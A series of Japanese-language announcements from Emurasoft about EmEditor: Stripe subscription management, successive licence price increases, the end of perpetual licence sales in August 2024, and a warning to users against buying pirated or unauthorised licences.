オフラインライセンスをリクエストすることでオフラインで登録できます。オフラインライセンスは登録キーの代わりとなります。

サブスクリプションの管理

サブスクリプションの表示

  1. エムソフト カスタマー センターにログインします。
  2. Stripeサブスクリプションセクションに移動して、アクティブなサブスクリプションを表示します。

変更の実施

  • Stripeポータルを使用して、Stripeサブスクリプションを管理したり、支払い方法を更新したりできます。

サポートとフィードバック

サポートが必要な場合は、お問い合わせフォームからご連絡ください。また、Stripe統合に関するフィードバックも歓迎しております。お客様の体験をさらに向上させるために役立てたいと思います。

EmEditorを引き続きご愛用いただき、誠にありがとうございます。私共は、安心で信頼性が高く、ユーザーフレンドリーなサブスクリプション体験を提供し続けることに全力を尽くします。

Emurasoft logo

価格改定のお知らせ

日頃より、EmEditor をご愛用いただき、誠にありがとうございます。

さて、弊社では 2022年8月以来、年間サブスクリプションの価格を据え置いてまいりました。しかし、諸経費の高騰や最近の外国為替の急激な変動により、開発とお客様への高品質なサービスを継続するために、価格を調整せざるを得なくなりました。つきましては、本年8月28日より、年間サブスクリプション1本の初年度価格を 5,600円から 7,200円(税別)に改定させていただきます。複数ライセンスを購入される場合の価格も改定となります。

また、以前お知らせしました通り、本年8月28日に永久ライセンスの販売を終了いたします。さらに、本年8月28日より、2年目以降の年間サブスクリプションの更新価格を現在の初年度の 50% から 75% に引き上げます。したがって、もし今後も長期間にわたって EmEditor Professional を使用される場合には、今のうちに永久ライセンスを購入すると、将来の経費を節約することができます。または、サブスクリプション ライセンスをお持ちの場合、2024年 8月 28日までに現在の価格でサブスクリプションを更新することができ、有効期限は変更されません。

必要なライセンスの計算方法についてもご確認ください。

今後も EmEditor の開発に集中し、より良いソフトウェアの開発とサポートの充実に全力を注いでまいります。何卒ご理解賜りますようお願い申し上げます。

Emurasoft logo

不正ライセンスの販売サイトにご注意ください

EmEditor ユーザーの皆様

EmEditor の開発者として、私たちのソフトウェアに関して皆様に共有したい重要なメッセージがあります。EmEditor Professional の海賊版や不正ライセンスが、さまざまなオンライン プラット フォームで大幅に割引された価格で販売されています。EmEditor のライセンスが、信じられないほど安い価格で提供されている場合、それはほぼ確実に違法なソースからのものであることをご認識ください。これらの販売は違法であるだけでなく、ユーザー様に重大なリスクをもたらします。皆様には、これらの不正なライセンスの購入を避けるよう強くお願い申し上げます。

不正なライセンスを避ける理由:

  1. 短期的な機能、長期的な失敗: 初期には、これらの不正ライセンスが機能しているように見えるかもしれません。しかし、最終的には「あなたは、ソフトウェア著作権侵害の被害者の可能性があります。EmEditor ホーム ページから正規のライセンスを購入してください。」と表示されるようにプログラムされています。これは、ソフトウェアが正常に機能しなくなることを示しています。
  2. 登録およびアクティベーションの問題: 正規の EmEditor ライセンスは、エムソフト カスタマー センターでの正しい登録を必要とします。不正ライセンスは、この重要なステップに失敗し、ソフトウェアを使用不能にします。未登録の製品は、警告メッセージを表示し、将来、重要な更新を行うことができなくなる可能性があります。
  3. セキュリティ上の懸念: これらの不正なライセンスを購入して使用することは、あなたを重大なセキュリティ リスクにさらします。しばしば、海賊版ソフトウェアの販売者は、あなたの個人情報や支払い情報を盗もうとします。
  4. オークション サイトでの購入:オークション サイトで販売されているライセンスには特に注意してください。オークション サイトで販売されている多くのライセンスは正規のものではなく、またソフトウェア ライセンスの所有権を変更することはできません。これらのソースから購入すると、正しく登録できない無効なライセンスを取得することになります。私共のソフトウェア ライセンスは、法的な名称変更の場合を除いて、名義変更を行うことはできません。

正規ライセンスの利点:

  • ソフトウェアの完全な機能と信頼性。
  • 定期的な更新とカスタマー サポートへのアクセス。
  • 法的なソフトウェアの使用とデータ セキュリティの保証。

ライセンスが正規であることを確認する方法:

公式ホーム ページまたは認可されたリセラーを通じて EmEditor ライセンスを購入してください。ライセンスの真正性に疑問がある場合は、購入を完了する前に、私共にお問い合わせください。

あなたの行動が重要です:

正規ライセンスを選択することで、スムーズで安全な体験を保証するだけでなく、EmEditor の継続的な開発と改善を支援しています。

私共はこの問題を非常に真剣に受け止め、これらの違法なライセンスの販売と戦っています。この努力において、皆さんの意識と協力が必要不可欠です。

継続的なサポートと EmEditor コミュニティの重要なメンバーであることに感謝します。

江村豊
EmEditor 開発者

参照:不正な取得・使用に対する警告 – クラック、Keygen、シリアルなど

登録検証システムについての説明

新しいバージョンで導入された登録検証システムの技術的内容について、江村誠がブログで説明しました。

Emurasoft logo

ライセンスの価格改定と、永久ライセンスの販売終了について

永久ライセンス

私共は、永久ライセンスを販売しています。他社が販売する「パーペチュアル (永続)」ライセンスと異なり、私共の永久ライセンスには、将来のアップデートを無期限に受け取る権利が含まれています。未来を予測することは困難ですが、私共は長期間にわたって EmEditor の開発とサポートを行いたいと考えています。私共の家族や従業員は EmEditor の売上に依存しており、売上は将来世代にも続く必要があります。そのため、2024年 8月 28日に永久ライセンスの販売を終了します2024年 8月 28日以降、永久ライセンスは販売されません。したがって、もし今後も長期間にわたって EmEditor Professional を使用される場合には、今のうちに永久ライセンスを購入すると、将来の経費を節約することができます。また、2023年 8月 30日に永久ライセンスの価格を現在の 36,400円 (税別) から 53,200円 (税別) に引き上げます

年間サブスクリプション

2024年 8月 28日に、2年目以降の年間サブスクリプションの価格を現在の初年度の 50% から 75% に引き上げます。サブスクリプション ライセンスをお持ちの場合、2024年 8月 28日までに現在の価格でサブスクリプションを更新することができ、有効期限は変更されません。本ウェブサイトからオンラインでサブスクリプション ライセンスを購入されている場合、前回の購入から30日以上経過していれば、1年間の更新を購入することができます。複数年の更新を購入されたい場合は、リンクをお送りしますので、お問い合わせください。販売代理店からサブスクリプションを購入されている場合は、販売代理店にお問い合わせください。

必要なライセンスの計算方法もお読みください

今後も EmEditor の開発に集中し、より良いソフトウェアの開発とサポートの充実に全力を注いでいく所存です。何卒ご了承賜りますようお願い申し上げます。

Emurasoft logo

ライセンスの価格改定について

日頃より、EmEditor をご愛用いただき、誠にありがとうございます。

さて、弊社におきましては、2015年4月以来、年間サブスクリプションの価格は据え置いてまいりました。しかしながら、諸経費は高騰し、さらに昨今の外国為替の急激な変動により、開発とお客様へのサービスを継続するためには、やむをえず、価格を調節する必要があります。したがいまして、本年8月1日より、年間サブスクリプション1本の初年度価格を 4,800円から 5,600円 (税別) に、また、永久ライセンス1本の価格を 30,240円から 36,400円 (税別) に改定させていただきます。複数ライセンスを購入される場合の価格も改定となります。

必要なライセンスの計算方法もお読みください。

今後も EmEditor の開発に集中し、より良いソフトウェアの開発とサポートの充実に全力を注いでいく所存です。何卒ご了承賜りますようお願い申し上げます。

Emurasoft logo

永久ライセンスの価格改定について

日頃より、EmEditor をご愛用いただき、誠にありがとうございます。

さて、弊社におきましては、2019年以来、永久ライセンスの価格は据え置いてまいりました。しかしながら、諸経費は高騰し、開発とお客様へのサービスを継続するためには、やむをえず、価格を調節する必要があります。したがいまして、本年4月1日より、永久ライセンス1本の価格を 21,600円から 30,240円 (税別) に改定させていただきます。複数ライセンスを購入される場合の価格も改定となります。しかし、年間サブスクリプションなどその他の製品の価格については、変更はございません。

また、必要なライセンス数について明確化しました。詳しくは、必要なライセンスの計算方法をお読みください。

今後も EmEditor の開発に集中し、より良いソフトウェアの開発とサポートの充実に全力を注いでいく所存です。何卒ご了承賜りますようお願い申し上げます。